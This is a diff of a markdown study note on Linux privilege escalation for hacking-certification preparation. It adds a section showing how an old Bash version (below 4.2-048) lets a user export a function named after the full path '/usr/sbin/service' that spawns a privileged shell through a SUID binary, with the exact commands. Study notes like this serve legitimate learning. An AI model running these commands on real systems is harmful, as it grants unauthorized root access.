floyddc/Hacking-Cert-Prep/notes/Linux Priv Esc/3-SUID-SGID.md

     - `.` => our current directory.
     - `:$PATH` => join the original path.
   - Now, running the binary we should be able to gain access to a root. shell.
 Check it with `whoami`.

+## Environment variables with full paths and vulnerable shell
+Check the shell version, for example with `/bin/bash --version` (if the shell is Bash).
+If the version is below 4.2-048, it's vulnerable and we can exploit shell functions with names that resemble file paths.
+- If the previous `service` is defined **with** its full path (`/usr/sbin/service`), we can exploit it through the shell vulnerability.
+- So let's create a custom function that executes bash code:
+  - `function /usr/sbin/service { /bin/bash -p; }` to run a root shell
+  - `export -f /usr/sbin/service`
+- Now, running the binary we should be able to gain access to a root. shell.
+Check it with `whoami`.